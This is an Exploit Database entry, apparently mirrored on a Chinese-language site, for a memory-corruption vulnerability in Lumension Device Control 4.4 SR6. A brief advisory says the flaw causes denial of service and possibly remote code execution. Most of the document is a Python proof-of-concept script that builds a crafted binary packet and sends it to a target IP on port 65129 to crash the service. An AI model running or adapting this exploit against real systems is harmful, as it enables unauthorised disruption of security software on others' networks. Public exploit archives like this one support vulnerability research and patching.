Lumension Security Lumension Device Control 4.x – Memory Corruption

• Exploit Database
• 46 阅读

• 作者： Andy Davis
  日期： 2011-05-24
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/35790/

• source: https://www.securityfocus.com/bid/47952/info
  
  Lumension Security Lumension Device Control (formerly Sanctuary) is prone to a memory-corruption vulnerability.
  
  An attacker can exploit this issue to cause a denial-of-service condition. Due to the nature of this issue, remote code execution is possible but has not been confirmed.
  
  Lumension Device Control 4.4 SR6 is vulnerable; other versions may also be affected. 
  
  #!/usr/local/bin/python
  
  import sys
  from socket import *
  import os
  
  if (len(sys.argv)!=2):
  	print "\n--------------------------------------------------"
  	print "Usage: %s <target IP>" % sys.argv[0]
  	print "--------------------------------------------------\n"
  	exit(0)
  
  host=sys.argv[1]
  port=65129
  
  packet1 ="\xec\x02\x00\x00"	#length of remaining packet
  packet1 += "\xc9\x00\x00\x00"	#some kind of packet ID?
  #packet1 += "\x18\x00\x00\x00"
  packet1 += "\x61\x61\x61\x61"	#crash occurs here
  
  packet1 += "\xc8\x02\x00\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3"
  packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x01\x00"
  packet1 += "\x00\x00\x0d\xd8\x91\x32\x61\xf4\x43\xa1\xe1\x8e\x27\x68\x6d\xde"
  packet1 += "\xbe\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x95\x00\x05\x01"
  packet1 += "\x03\x00\x00\x03\x01\x10\x02\x00\x00\x00\x00\x00\x00\x00"
  packet1 += "\x34\x2e\x34\x2e\x31\x34\x35\x32" #client version
  packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd6\x5e"
  packet1 += "\xe0\x81\xdb\xd8\xcb\x01\xe4\x95\x45\xe1\xdb\xd8\xcb\x01\x7c\x99"
  packet1 += "\x47\xbc\xdb\xd8\xcb\x01\xd6\xbc\xb0\x34\xdc\xd8\xcb\x01\x02\x00"
  packet1 += "\x00\x00\x9c\x47\x57\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3"
  packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  packet1 += "\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
  packet1 += "\xc0\xa8\x00\x6b" #client IP address
  packet1 += "\xff\xff\xff\x00" #client subnet mask
  packet1 += "\x61\x00\x63\x00\x65\x00\x72\x00\x2d\x00\x65\x00\x38\x00"
  packet1 += "\x31\x00\x37\x00\x66\x00\x61\x00\x65\x00\x30\x00\x64\x00\x38\x00" # client hostname
  packet1 += "\x00" * 480
  packet1 += "\x00\x00\x40\xfc\xba\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80"
  packet1 += "\x85\xcc\x23\x00\x00\x00\x80\xee\x36\x00\x93\x84\xde\x84\x02\x00"
  packet1 += "\x00\x00\x00\x00\x00\x00"
  
  s = socket(AF_INET, SOCK_STREAM)
  s.connect((host, port))
  s.send(packet1)
  print s.recv(1024)
  s.close()